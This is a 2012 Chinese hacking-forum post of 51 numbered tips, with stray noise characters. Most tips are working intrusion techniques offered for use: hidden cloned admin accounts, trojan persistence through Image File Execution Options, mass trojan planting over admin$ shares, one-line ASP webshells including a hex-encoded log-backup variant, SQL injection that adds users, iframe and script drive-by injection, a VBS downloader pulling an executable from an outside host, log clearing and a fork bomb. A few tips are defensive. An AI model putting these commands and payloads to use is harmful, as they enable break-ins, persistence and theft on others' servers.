找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2295|回复: 0
打印 上一主题 下一主题

一些笔记

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-15 14:51:03 | 只看该作者 回帖奖励 |正序浏览 |阅读模式
1、Xp系统修改权限防止病毒或木马等破坏系统,cmd下,
) f4 C) K. p. d2 ^( L) N% Jcacls C:\windows\system32 /G hqw20:R
, D2 t5 t3 {: l思是给hqw20这个用户只能读取SYSTEM32目录,但不能进行修改或写入* H# `0 V, d0 r9 b, q1 V0 z; N
恢复方法:C:\>cacls C:\windows\system32 /G hqw20:F
! r7 G" P; f' w6 K/ U0 i# g
! q' i  m# W9 A2、用Microsoft自带的IExpress工具作的捆绑木马可以躲过很多杀毒软件,运行对话框中输入Iexpress。; _: i8 C. c9 B. `$ P& F5 a
, h# |2 {; X; f
3、内网使用灰鸽子,肉鸡上vidcs.exe -p端口,本地VIDCS里,VIDCS服务IP 填肉鸡的IP,VIDCS服务端口,就是给肉鸡开的端口,BINDIP添自己的内网IP,BIND端口 添8000,映射端口添8000。. `6 |( S  r9 E' W: g) f  i$ H* D
& ~9 D* w4 T) ?
4、建立隐藏帐号,上次总结了用guest建立隐藏的管理员,这次再介绍一种,在cmd下建立一个ating$的用户,然后注册表下复制管理员的1F4里的F 值到ating$的F值,再把ating$改为$,这样在计算机管理的用户里看不到这个隐藏帐号
4 e) m1 l8 I+ @. q' Q  o% _" @7 ?4 P5 u# M- j: `# T# v# q
5、利用INF文件来修改注册表
" E" N( K: a5 O, H3 U[Version]
" q4 u* X& B$ ]9 X' [4 i. u* W, qSignature="$CHICAGO$", v$ j6 M) }& t( I' z- r
[Defaultinstall]
' t2 U/ r% L4 m$ A9 N  DaddREG=Ating
9 d4 @2 j, M* K9 S[Ating], x: d, j1 T# z; S1 ]& X( `7 `: ^
HKCU,"Software\Microsoft\Windows\CurrentVersion\Policies\system","disableregistrytools","0x00010001","1"% H; P( J- m' p7 G
以上代码保存为inf格式,注意没有换行符,在命令行里导入inf的命令如下:
% S" b) _" t( ^7 E5 w7 qrundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 inf文件的具体路径
/ f, K: p6 f, y+ P6 P7 y其中HKEY_CLASSES_ROOT 简写为 HKCR,HKEY_CURRENT_USER 简写为 HKCU
& k9 J2 W: s, z) gHKEY_LOCAL_MACHINE 简写为 HKLM,HKEY_USERS 简写为 HKU
, z" f( h# ^) d; r& M5 E+ xHKEY_CURRENT_CONFIG 简写为 HKCC& T4 R1 K6 C( `& V  m" k  e
0x00000000 代表的是 字符串值,0x00010001 代表的是 DWORD值6 y; k3 G& V2 [6 r
"1"这里代表是写入或删除注册表键值中的具体数据' Q2 i* m' g& {% I5 w

' k4 }0 e% [) l/ y6、关于制作穿xp2防火墙的radmin,大家一定要会,各大黑客网站都有动画,
* d+ K/ o6 ^; O3 L* M0 Q多了一步就是在防火墙里添加个端口,然后导出其键值# T: Y# X* f- `8 t
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List]
1 @$ R& u  L1 i) Z( ~
' V2 d9 |; y) A, r; \( o( e! c7 ]7、系统启动时Alerter服务启动前启动木马程序ating.exe,此方法很隐蔽$ Z5 e# p7 I# N  l
在[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CurrentVersion\Image File Execution Options]下建立service.exe项,再在service.exe项建立一个Debugger的键(字符串值),键值填ating.exe的全路径。$ E2 m& H9 p/ g9 j# C# ?+ C% m
* S2 N  I8 [$ X6 |1 X
8、将ftp.exe传到服务器用来提权,可以先把它变成ating.gif格式的再用,迷惑管理员。; _2 m' q$ k& @: Q

/ a; n7 a, G: A' h5 L9、有时候在我们进入了网站后台,但是没有上传图片和备份等功能,得不到webshell,: j. J# y) d/ F- r, w( }; b7 `
可是不能白来一场,可以看看发表公告或新闻支不支持html和script,支持的话加个frame马或者其他的什么。
. Y" R& A. b/ K+ M" ?& F3 w' l7 ]6 s6 u% p& A
10、用google帮我们找网站后台,搜索”filetype:asp site:www.hack6.com inurl:login”7 Q7 @* |, b# T
4 e5 \; n& }$ [5 @
11、我们中了盗密码的木马后不要急于删除,一般这些木马都是把密码发到指定邮箱,我们可以用探嗅软件来找到邮箱的用户名和密码,比如安全焦点的xsniff,
' |9 }1 l& O2 L- O% q% _用法:xsniff –pass –hide –log pass.txt5 x+ I- ]) `. }0 E. D& p) H; k
% {9 ?! D7 F6 {  q
12、google搜索的艺术# b0 C  ]; z# J/ K5 c% q
搜索关键字:“未闭合的引号”或“ADODB.Field.error”或“Either BOF or EOF in True”
7 w9 E. C3 b2 @( A/ {9 X或“字符串的语法错误”可以找到很多sql注入漏洞。) ]; h, a8 a3 E( ~, }4 I

. j1 b" W4 J4 F) d) X  ^( y6 a13、还可以搜一些木马的关键字,比如搜索“管理登陆 海洋顶端 inurl:asp”,搜到了说明此网站服务器的其中网站肯定有漏洞。; f) D! C7 z3 P: N, }& v* e

6 k* e2 z$ L: p' v3 v, o6 e14、cmd中输入 nc –vv –l –p 19875 w$ |6 q. H  U, b$ e) B
做个bat文件内容为sqlhello 起始ip 1433 终止ip 1987 扫鸡吃* q2 a4 L: ]" g+ c, W/ m
; j" v* h- V5 z7 W/ [* P/ [6 d
15、制作T++木马,先写个ating.hta文件,内容为4 F/ w- N0 g  b5 F/ o0 M4 Q$ l
<script language="VBScript">
' l" X9 Z. F0 D  kset wshshell=createobject ("wscript.shell" )
, v( h$ ?+ m  Qa=wshshell.run("你马的名称",1)1 M1 ^) y1 e* z4 k1 M
window.close' s  R6 W' f0 R# Z" d
</script>
, G/ K0 a1 R9 U2 t1 S再用mshta生成T++木马,命令为mshta ating.hta ating.t++,用网页木马生成器生成网页木马。
% f- z! e. ^4 p, r% s5 g, W2 I( |8 M: K$ h$ l6 R: D& p. \: m" V
16、搜索栏里输入5 {0 c9 M9 r. P+ V" b
关键字%'and 1=1 and '%'='& W5 V, b, i9 k! f+ S' d6 l5 e; V
关键字%'and 1=2 and '%'='
% l( b  Q- v( [3 Y比较不同处 可以作为注入的特征字符. ^1 n6 y/ W1 V& I3 Y7 V% M, K8 M

! {1 f" N0 y! M2 |8 W5 d4 k17、挂马代码<html>. b1 z# \$ f5 D3 h3 k- d
<iframe src="马的地址" width="0" height="0" frameborder="0"></iframe>/ I+ b0 c) \4 E1 D0 D# Y" V
</html>8 Y3 `6 Y+ n. n! X; G  j/ R! m
  r0 K9 D' S3 I* ^4 D) n
18、开启regedt32的SAM的管理员权限检查HKEY_LOCAL_MACHINE\SAM\SAM\和HKEY_LOCAL_MACHINE\SAM\SAM\下的管理员和guest的F键值,如果一样就是用被入侵过了,然后删了guest帐号,对方可以用guest帐号使用administraeors的权限,你也可以用这方法留住肉鸡, 这方法是简单克隆,7 f5 E) W) }8 v9 ?$ I
net localgroup administrators还是可以看出Guest是管理员来。5 x, ~' a. z9 _; Y& m! s  f+ U( U

% I0 b- x" U3 P5 e8 |! A19、软件instsrv.exe 把.exe文件做成系统服务来启动 用来肉鸡挂QQ等
* J0 k* Y8 n0 ^* N) r用法: 安装: instsrv.exe 服务名称 路径
8 N$ p3 W0 U7 S5 Q卸载: instsrv.exe 服务名称 REMOVE
8 ]/ U" M" t- g. U
6 @! E; v' ^0 a. q' N" b
9 Z) I% k. l/ J( e; l+ Z/ T21、SQL注入时工具---Internet选项---高级里找到显示友好的错误信息勾去掉- i' D# U& m; _2 o! Z
不能注入时要第一时间想到%5c暴库。
9 y; I' l7 C$ r% d! X% Q1 y2 ^% m
22、很多网站程序(比如华硕中文官方网站)上传图片时有可能在检测文件的时候是 从左朝又进行检测,也就是说,他会检测文件是不是有.jpg,那么我们要是把文件改成:ating.jpg.asp试试。。由于还是ASP结尾,所以木马不会变~
+ i: h% G1 Y2 v4 J* O7 ]0 z0 P3 J) s; A/ ^; u
23、缺少xp_cmdshell时
9 n" i/ _: ^) P3 S尝试恢复EXEC sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'
; V+ b# y: X, L+ h. N假如恢复不成功,可以尝试直接加用户(针对开3389的)( K$ S/ @6 p$ i
declare @o int
: e: H& d/ E; T, o. z% Wexec sp_oacreate 'wscript.shell',@o out
7 {& B; v, `4 R# v' ~+ e6 W% ^exec sp_oamethod @o,'run',NULL,'cmd.exe /c net user ating ating /add' 再提到管理员
3 W& D1 U- C; T, b8 M3 i4 X4 r5 {
24.批量种植木马.bat: \* p; n7 r% y
for /f %%i in (扫描地址.txt) do copy pc.exe %%i\admin$ 复制木马到扫描的计算机当中9 _$ d) r. q, ^0 l. Q5 @/ L, m2 j! J
for /f %%i in (扫描地址.txt) do at %%i 09:50 pc.exe 在对方计算机上运行木马的时间
7 }( S  x+ s: j" r扫描地址.txt里每个主机名一行 用\\开头
3 |- k: J+ _2 P# e
2 S5 B' T% D" g, ~25、在程序上传shell过程中,程序不允许包含<% %>标记符号的内容的文件上传,比如蓝屏最小 的asp木马<%execute request("l")%>,我们来把他的标签换一下: <script language=VBScript runat=server>execute request("l")</Script> 保存为.asp,程序照样执行。6 @3 Z2 ]  y3 n, n" z/ E
# F8 {3 B% P/ Y) J- ?- n0 L
26、IIS6 For Windows 2003 Enterprise Edition 如IIS发布目录文件夹包含.asp后辍名.
; J3 B( x0 `. S8 p! N将.asp后辍改为.jpg或其它的如.htm,也可以运行asp,但要在.asp文件夹下.
" ^: C, X2 l8 ~" G/ e.cer 等后缀的文件夹下都可以运行任何后缀的asp木马- d4 n4 f% u9 i: ]/ C
; b+ y+ z% r$ q
27、telnet一台交换机 然后在telnet控制主机 控制主机留下的是交换机的IP
  s2 K8 t" J* r2 g然后用#clear logg和#clear line vty *删除日志
$ U0 y# O8 w6 k0 R9 r4 c2 ^: x& I3 f- q7 f
28、电脑坏了省去重新安装系统的方法
  I, R) `# W2 Z: M纯dos下执行,
; b4 ?% i7 G1 x! K- sxp:copy C:\WINDOWS\repair\*.* 到 c:\windows\system32\config" u& H' T! R% _# }9 v0 X" v' S
2k: copy C:\winnt\repair\*.* 到 c:\winnt\system32\config* U& ~0 }/ m7 \, Y

1 ]" G, @8 S/ S5 M, }29、解决TCP/IP筛选 在注册表里有三处,分别是:
4 E8 P! r6 R. U, kHKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip% P0 g, q. _( o) ^
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip9 g& v3 Y& t- R$ H+ l
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip: f; x8 P9 x* x& D, D/ k
分别用9 s' L! ^! z7 p! X6 ^* b6 h
regedit -e D:\a.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip; I3 }' |# K+ e8 ]" S- Z
regedit -e D:\b.reg HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip4 L: I  x2 h3 ^& h* G6 I
regedit -e D:\c.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
/ C. i1 \  s" y0 Q6 B' ~命令来导出注册表项
6 D' z  B+ `+ ?( R! v( i$ D. l8 g然后把三个文件里的EnableSecurityFilters"=dword:00000001,1 C/ Y5 v' W) f7 s% `( p
改成EnableSecurityFilters"=dword:00000000 再将以上三个文件分别用
9 Y& |. g( H: Pregedit -s D:\a.reg regedit -s D:\b.reg regedit -s D:\c.reg 导入注册表即可。$ N; S5 c- d8 j  g$ `- {9 h
& v# O( K4 Y! r% D2 h1 A3 n
30、使CHM木马无法在本地运行木马程序 将注册表"HKEY_CURRENT_U: X; |3 P7 |9 {% y# _
SER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0"下的1004项的值由原来十进制的0改为十六进制的32 V: q9 m% R9 R& N6 j  m( a! [1 ^

, [- q" M+ o! i: ?2 W5 |7 D31、全手工打造开3389工具8 c; i* y/ f" y, ?, O$ _
打开记事本,编辑内容如下:
4 ~4 c) ^% d2 k0 M# techo [Components] > c:\sql
' R& B4 d  l! o; ?echo TSEnable = on >> c:\sql  |% K( Z6 |- x
sysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\sql /q
& d* D( q8 p$ I6 a& g' w* u编辑好后存为BAT文件,上传至肉鸡,执行( d1 V9 L. S) m

" ]" `- n5 g8 ]32、挂马js代码document.write('<iframe height=0 width=0 src="木马地址.htm"></iframe>');保存到js页面里 可让所有页面挂马
2 A' {# R! [6 R# Z
2 q  V! B0 L4 P1 \/ X33、让服务器重启
. n7 v$ O% \4 N写个bat死循环:
7 i, k) p+ b  K% r( D@echo off- |+ r0 O  j$ ~$ e! ?& R& @/ E
:loop1
  J& u- N; d! b* }: k) ]( Zcls8 }/ u5 L7 A; S% V
start cmd.exe3 H9 p5 j  V" M$ n& t2 S2 r% r
goto loop1% r& Z/ t/ d  }& y5 Y* Q, s
保存成bat guset权限就可以运行 运行后很快服务器就会死机 管理员自然会去重启9 W: u3 j! Q& [! Z: V
' n5 m; y8 P+ ]1 C& I
34、如果你登录肉鸡的3389时发现有cmd一闪而过,那你可要小心了,管理员写了个bat在监视你,
  m  d8 V  W, @# F5 _6 @+ A$ f@echo off
: |1 ^* n9 x2 [7 w9 E6 hdate /t >c:/3389.txt
' R( b4 x- n. X8 G1 M% [+ ctime /t >>c:/3389.txt* ~" N: }3 I, }; w' t
attrib +s +h c:/3389.bat
& I4 s2 P( Q& Aattrib +s +h c:/3389.txt; y( r% S6 L9 c1 p, e
netstat -an |find "ESTABLISHED" |find ":3389" >>c:/3389.txt
3 Z* d8 r! U" G- X% _7 @并保存为3389.bat
% p. {/ D4 [% E5 i2 ?: J8 S, j) b打开注册表找到:Userinit这个键值 在末尾加入3389.bat所在的位置,比如我放到C盘,就写:,c:/3389.bat,注意一定要加个逗号
0 E1 J, G- [7 f6 g% z$ c6 M4 O/ ?5 j5 k# E
35、有时候提不了权限的话,试试这个命令,在命令行里输入:( e  Q1 ^: e7 O/ ~6 B
start http://www.hack520.org/muma.htm然后点执行。(muma.htm是你上传好的漏洞网页)
- v+ a( B; i; r输入:netstat -an | find "28876" 看看是否成功绑定,如果有就telnet上去,就有了system权限,当然也可以nc连接,本地执行命令。
7 ]8 m- Y+ c7 ]/ I
2 d" _' d) i9 w2 p- z36、在cmd下用ftp上传马方法,我们可以用echo 写一个批处理文件
  l! t+ v0 m' R3 G/ _echo open 你的FTP空间地址 >c:\1.bat //输入你的FTP地址  d. k! W2 g- x- X$ x/ _" @8 [
echo 你的FTP账号 >>c:\1.bat //输入账号
( |  E3 f1 `( eecho 你的FTP密码 >>c:\1.bat //输入密码
3 g$ Y5 Q/ k& f6 u6 Y3 n9 {6 @echo bin >>c:\1.bat //登入
& _. P/ [3 m( R9 i3 Z4 n; U9 q* w# Oecho get 你的木马名 c:\ ating.exe >>c:\1.bat //下载某文件到某地方并改名为什么# @, _+ J+ Y# X+ |8 H
echo bye >>c:\1.bat //退出9 B- k# g1 J8 s* R
然后执行ftp -s:c:\1.bat即可
8 a8 C1 l- M) u0 |2 D
3 A1 n. a" g! ~7 j5 }1 a37、修改注册表开3389两法
0 u4 V) [9 t( k( t/ I(1)win2000下开终端 首先用ECHO写一个3389.reg文件,然后导入到注册表. P! m+ n  i9 r7 I. Z5 G0 |0 `% c. g
echo Windows Registry Editor Version 5.00 >>3389.reg1 k5 @$ z0 Z. b% E& n! {& v4 [
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>3389.reg, g* z3 w3 ~- D3 l9 J1 |( g3 Z
echo "Enabled"="0" >>3389.reg
% h' g4 c- D6 B/ @& secho [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
* M# u1 Z8 Q7 g- O* I% PNT\CurrentVersion\Winlogon] >>3389.reg8 ^8 K: R- ^) H, v
echo "ShutdownWithoutLogon"="0" >>3389.reg8 w" |2 ^( ~# ^3 l6 R+ U
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer]
  l- r1 O& ^$ f8 M  m>>3389.reg+ b# V* k5 c* C& b
echo "EnableAdminTSRemote"=dword:00000001 >>3389.reg* T2 j% `9 S- f4 R# y
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]
6 _' W& Y; _0 _( z2 x1 P! D# [. a! u: _>>3389.reg
9 C1 [1 j# r; N/ y* \) [* ]) techo "TSEnabled"=dword:00000001 >>3389.reg) e4 o8 P- f, _$ _! R1 p
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>3389.reg3 T6 @) R- P* B5 i) I2 m9 I
echo "Start"=dword:00000002 >>3389.reg( n2 \* J) A( M0 Q( I2 e0 T( g
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService]
& J3 E: h* q' z% W>>3389.reg
$ w* v$ r5 v; N7 ~echo "Start"=dword:00000002 >>3389.reg6 l  y5 ?( U8 B$ l+ z# M
echo [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>3389.reg# x! o; ^& I8 o# v
echo "Hotkey"="1" >>3389.reg" W, K# Y; N4 i" \
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
" d% b4 K2 I( K" GServer\Wds\rdpwd\Tds\tcp] >>3389.reg* w( n0 q2 x. Q$ C" C) I
echo "PortNumber"=dword:00000D3D >>3389.reg
) z0 U0 A3 f3 Fecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal+ }0 Z' r( U; S* r; x2 Q, |
Server\WinStations\RDP-Tcp] >>3389.reg4 f, Q, o8 U: E4 F& S# F4 M
echo "PortNumber"=dword:00000D3D >>3389.reg+ C+ O$ a3 f4 T, i) G+ p) y8 Y
把这些ECHO代码到CMDSHELL下贴粘就可以生成3389.reg文件,接着regedit /s 3389.reg导入注册表。; x( B4 F! }1 d, y( A/ k0 S2 w
(如果要改变终端端口只须把上面的两个D3D都改一下就可以了)1 \( d" w( p* m2 R
因为win 2k下开终端不能像XP一样可以立即生效,而是需重启机器后才生效" W0 i2 r+ k/ u9 m& b* f7 s
(2)winxp和win2003终端开启- a; X4 h6 K, E* e) _
用以下ECHO代码写一个REG文件:
& n, L" K1 `- g7 k: {echo Windows Registry Editor Version 5.00>>3389.reg# U0 D5 K. c; G, d4 N2 T& D- \
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal% E0 W: C5 q- }! ]5 |
Server]>>3389.reg
+ L/ f8 T: X% U3 }9 |4 {6 Aecho "fDenyTSConnections"=dword:00000000>>3389.reg4 Y) F% c; g* i+ U3 }
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
7 |% ]3 v" b" H8 f1 m9 gServer\Wds\rdpwd\Tds\tcp]>>3389.reg+ X' ~$ f9 y5 U; O' R1 b5 W
echo "PortNumber"=dword:00000d3d>>3389.reg
' ~) `& S: u' a0 Xecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
9 ]: Y" h8 l6 j! P1 u' s1 UServer\WinStations\RDP-Tcp]>>3389.reg8 t% }: z' f) s% Q' P9 d' D5 i' Y6 V
echo "PortNumber"=dword:00000d3d>>3389.reg
. q: W5 m4 H/ b  t4 f1 @( d+ \$ {然后regedit /s 3389.reg del 3389.reg
$ i0 F+ [9 \9 Y! n7 ?# C2 VXP下不论开终端还是改终端端口都不需重启! r% M3 ]# @  o
3 c& ?7 u/ N6 A" h5 k  j
38、找到SA密码为空的肉鸡一定要第一时间改SA密码,防止别人和我们抢肉吃
) V  J: f; B0 T" f, |; Y用查询分析器运行 EXEC sp_password NULL, '你要改的密码', 'sa'
1 e( q1 W3 f: L0 @; t" a5 {9 c. }2 T- M: v* C
39、加强数据库安全 先要声明把mdb改成asp是不能防止下载的!
9 ]1 R5 D( Q5 b" _8 N(1)数据库文件名应复杂并要有特殊字符
4 \, T) S+ Z- r9 {* X(2)不要把数据库名称写在conn.asp里,要用ODBC数据源
: J3 {! o# U5 O. Q3 ?( R; p将conn.asp文档中的
  |$ Y; f. ~% ~6 P$ h, y8 VDBPath = Server.MapPath("数据库.mdb")2 F+ k; D$ f* R! o
conn.Open "driver={Microsoft Access Driver (*.mdb)};dbq=" & DBPath! J3 c# N+ Z% E" i

% e  }; w" O( l修改为:conn.open "ODBC数据源名称," 然后指定数据库文件的位置1 N5 A" m/ d/ G2 A* s
(3)不放在WEB目录里" C8 y- Y5 W. j, y
" ^2 a9 }* {- v- P
40、登陆终端后有两个东东很危险,query.exe和tsadmin.exe要Kill掉- I  h' R) ^' m8 g& e6 X, G, B
可以写两个bat文件
8 h$ N! b9 ^/ Y8 s# ~' H" |: K@echo off( W6 o9 c, s0 O7 k7 f" f/ a1 c
@copy c:\winnt\system32\query.exe c:\winnt\system32\com\1\que.exe
; _& O. s0 l% j: p& n& v@del c:\winnt\system32\query.exe/ d# A( M5 B; f5 G  @) W; A9 L
@del %SYSTEMROOT%\system32\dllcache\query.exe/ m- O8 Q+ C4 J2 C
@copy c:\winnt\system32\com\1\query.exe c:\winnt\system32\query.exe //复制一个假的. a3 v6 u9 {  ]; j) {2 t
. L! j4 ], U9 x; H! U" K4 d% @
@echo off
% I4 u& Y" q9 ?/ P6 u9 n. x' a@copy c:\winnt\system32\tsadmin.exe c:\winnt\system32\com\1\tsadmin.exe5 J7 T+ J/ D7 N) I4 q( R
@del c:\winnt\system32\tsadmin.exe6 P* I1 z* S7 ~) B
@del %SYSTEMROOT%\system32\dllcache\tsadmin.ex
0 A. g7 k6 M, q6 J) R+ T! V3 h
8 I; _6 m7 [7 q% q41、映射对方盘符
; B/ _7 W% ?/ P: J+ J; ?- rtelnet到他的机器上,: x# ~0 p# a; z2 X4 _. g: c
net share 查看有没有默认共享 如果没有,那么就接着运行3 O% M% Z* P2 k, T  K
net share c$=c:7 `3 P  x" i# h6 `
net share现在有c$4 ~7 F' {, v: \/ o+ q
在自己的机器上运行
6 }3 v$ u- T4 V+ G; t( V% _- U7 S, Bnet use k: \\*.*.*.*\c$ 把目标共享映射到本地硬盘,盘符为K: t/ R6 d- v3 v+ E( d
6 J' n2 P6 h$ C5 f# x
42、一些很有用的老知识2 a9 W; V, b  ~' h8 I
type c:\boot.ini ( 查看系统版本 )" o9 ]) u( X2 B5 H& W
net start (查看已经启动的服务)
% c& j# K: l! }7 \/ d; F0 xquery user ( 查看当前终端连接 )( [7 t- N1 k* i# z" g+ X6 u
net user ( 查看当前用户 )' F( l' a: ^4 @% n. t( u
net user 用户 密码/add ( 建立账号 )7 Q* Q' `2 W) _, f* E2 p7 g+ p
net localgroup administrators 用户 /add (提升某用户为管理员)* y# s6 |, a0 q! w) _3 n
ipconfig -all ( 查看IP什么的 )
, V: _) v8 c$ i8 `. snetstat -an ( 查看当前网络状态 )
  m, ^! v! c+ J( r4 {. ]findpass 计算机名 管理员名 winlogon的pid (拿到管理员密码)6 U. O2 w; H8 U9 ~% r0 S
克隆时Administrator对应1F4
* a0 `! j# Y( r$ N  E6 a( \guest对应1F55 p( y- ?/ C7 ^$ x3 ]' K" x2 X
tsinternetuser对应3E8
3 E; N2 |1 g. i- [. @/ k: E6 e3 a# T% }, {+ v# N0 _& d
43、如果对方没开3389,但是装了Remote Administrator Service4 h- G" A0 D4 O9 B6 R1 w' i
用这个命令F:\ftp.exe "regedit -s F:\longyi.biz\RAdmin.reg" 连接
! u/ _5 r+ w' y/ Y; t+ ]解释:用serv-u漏洞导入自己配制好的radmin的注册表信息. K- r  T/ k( X0 v4 ?8 ^
先备份对方的F:\ftp.exe "regedit -e F:\1.reg HKEY_LOCAL_MACHINE\SYSTEM\RAdmin"  [2 L( ^4 d5 }; X5 \1 K

7 S% a) |) Q5 V0 V3 k44、用lcx做内网端口映射,先在肉鸡上监听 lcx -listen 52 8089 (端口自定)8 }1 T0 b7 W, t- j/ U! x4 X3 T  q' K* i
本地上运行映射,lcx -slave 鸡的ip 52 我内网的ip 80 (我的WEB是80端口)
6 Y( x" h: X* E  l: F) x
, M; K! N7 o% i% Y7 W! w45、在服务器写入vbs脚本下载指定文件(比如用nbsi利用注入漏洞写入)
' n* J% f$ I% wecho Set x= CreateObject(^"Microsoft.XMLHTTP^"):x.Open# B, o: g0 |" o4 D, B" r
^"GET^",LCase(WScript.Arguments(0)),0:x.Send():Set s =
9 V3 _# t7 g2 `- H% ?CreateObject(^"ADODB.Stream^"):s.Mode = 3:s.Type =
1 N# i' h- M* g2 |) y3 n5 m1:s.Open():s.Write(x.responseBody):s.SaveToFile LCase(WScript.Arguments(1)),2 >ating.vbs
# x. t, V. T- Y* h, r- ?. U(这是完整的一句话,其中没有换行符)
$ Y+ o' q" ]! O) b$ k, N* b然后下载:7 O% T6 z# ^! c$ g
cscript down.vbs http://www.hack520.org/hack.exe hack.exe9 ?2 {% i# G% T/ C4 \0 M) j7 [

! @1 q' `/ n+ \+ l2 a( b1 s9 m5 Q46、一句话木马成功依赖于两个条件:5 \2 H7 }, a& }) _2 R
1、服务端没有禁止adodb.Stream或FSO组件
% i7 K4 U* E! \! W: G" _2、权限问题:如果当前的虚拟目录禁止user级或everyone写入的话也是不会成功的。
0 D% i; ?7 g7 T1 M! @1 {  E% p. @) b# r, q: O# S8 R
47、利用DB_OWNER权限进行手工备份一句话木马的代码:
) q) c8 }' }, f$ G5 [;alter database utsz set RECOVERY FULL--
+ [2 N! {/ q7 s8 q; _2 D* C. s;create table cmd (a image)--% e/ u8 o* p+ c. I5 I, q5 O
;backup log utsz to disk = 'D:\cmd' with init--4 b- Y! W! y' c
;insert into cmd (a) values (0x3C25657865637574652872657175657374282261222929253EDA)--
# S1 ~, H! K+ s" t7 X& }! X( _% G;backup log utsz to disk = 'D:\utsz_web\utsz\hacker.asp'--+ W. |* d2 |$ L; I) X9 [. H7 [0 k
注:0x3C25657865637574652872657175657374282261222929253EDA为一句话木马的16进制形式。
! F$ g+ v3 B) c/ Y0 |( ?) u6 F
5 [  X' A1 @# M  d5 C+ `# H2 X  }& v48、tlntadmn是telnet服务的设置命令,可以对telnet服务的端口、认证方式等进行设置:
2 J2 K! t: `6 v% M
; ^2 [# _8 ~% L6 C5 n: o用法: tlntadmn [computer name] [common_options] start | stop | pause | continue | -s | -k | -m | config config_options$ j% L+ X# V0 m1 b* Y. r$ g# j
所有会话用 'all'。
8 m% @. P8 Y% M; H: r! ~* \4 N0 V6 T-s sessionid 列出会话的信息。: W6 i5 L  \8 S9 q/ S2 @; D- @8 Q
-k sessionid 终止会话。
% Y3 c) ~# H: a# l( z& s0 s. w-m sessionid 发送消息到会话。6 b. @, u  h" u* |

0 d: C, P' U6 Nconfig 配置 telnet 服务器参数。% C  x" C9 G* M
; g5 v8 D; x% w* H8 H6 Z0 Y% z7 E
common_options 为:+ s) v9 H, K# h7 E
-u user 指定要使用其凭据的用户& y! s5 ]$ U& A
-p password 用户密码& f: x, k9 W. U3 p, F

$ ]2 F4 U) L1 y- J* Mconfig_options 为:
+ n/ Z' ~3 M5 F: ?dom = domain 设定用户的默认域+ P1 Y" z5 _0 h( F; R: u  J
ctrlakeymap = yes|no 设定 ALT 键的映射
% i+ l5 Q" h. z# T  Stimeout = hh:mm:ss 设定空闲会话超时值) \' k# P7 _. q
timeoutactive = yes|no 启用空闲会话。
( _. p, m: R  M0 z: g' @- l3 gmaxfail = attempts 设定断开前失败的登录企图数。
3 j! s3 s3 k8 imaxconn = connections 设定最大连接数。
* B/ c7 O/ v( Y2 ~port = number 设定 telnet 端口。
$ n7 L1 h. s0 w( \9 J# ssec = [+/-]NTLM [+/-]passwd. ~# c0 i/ T; e* x+ U
设定身份验证机构
3 A; |6 l9 j. F1 {" Mfname = file 指定审计文件名。7 E% e$ ?- T* g3 h5 K" l! u
fsize = size 指定审计文件的最大尺寸(MB)。8 X% z9 K7 H* A% S4 ^9 ]- o+ @7 |7 Z. q
mode = console|stream 指定操作模式。
* }" Z$ u( {  Z* \* x6 Z, ?3 z) oauditlocation = eventlog|file|both
" Q  H0 \5 I& s3 J9 F; x指定记录地点0 f+ f0 f) [8 ~" |; k  x8 J
audit = [+/-]user [+/-]fail [+/-]admin
8 Z4 N$ l0 s, `4 z3 a2 H  ?
7 R; z! N+ i6 j) p% v$ f49、例如:在IE上访问:
% `8 ~, p  k* h- D1 Iwww.hack520.org/hack.txt就会跳转到http://www.hack520.org/
4 Y  l0 f! s7 Z: \+ W4 {hack.txt里面的代码是:, w  G: L9 Y' C4 E
<body> <META HTTP-EQUIV="Refresh" CONTENT="5;URL=http://www.hack520.org/">" b8 H0 g% y  _( I( I  w# Z+ E+ n
把这个hack.txt发到你空间就可以了!. t: Z, o  E4 {: h
这个可以利用来做网马哦!7 c$ \7 s( S! w1 i
) h9 g# ~8 `! x& ~! q0 a
50、autorun的病毒可以通过手动限制!
1 P8 Z6 A1 v  }" \! G( O; A1,养成好习惯,插入U盘或移动硬盘,都要按住shift让其禁止自动运行!) c, T8 A, R; H4 p' O
2,打开盘符用右键打开!切忌双击盘符~$ I3 ]# O1 q5 {
3,可以利用rar软件查看根目录下autorun病毒并删除之!他可以处理一些连右键都无法打开的分区!- b8 Y6 [- b7 Y. x

3 Z! h/ [/ Z/ a! k8 p* j* j51、log备份时的一句话木马:/ a1 A1 J" v: F0 @4 ]- `9 l
a).<%%25Execute(request("go"))%%25>
3 m) ?; R, f. E1 w6 K! m9 Db).<%Execute(request("go"))%>
' M# M4 J9 ^* f; w, Q" S# H8 v1 Tc).%><%execute request("go")%><%! |# a3 W  }' N4 d: h/ O/ U
